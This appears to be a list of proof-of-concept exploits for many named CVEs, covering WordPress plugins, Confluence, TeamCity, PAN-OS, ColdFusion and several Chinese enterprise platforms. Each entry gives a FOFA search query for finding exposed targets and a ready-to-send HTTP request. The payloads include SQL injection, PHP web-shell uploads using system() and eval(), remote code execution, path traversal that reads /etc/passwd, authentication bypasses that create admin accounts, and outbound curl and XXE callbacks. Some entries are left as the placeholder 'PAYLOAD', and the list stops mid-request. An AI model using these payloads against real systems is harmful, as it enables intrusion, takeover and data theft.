FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php

119. Beijing Byzoro (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

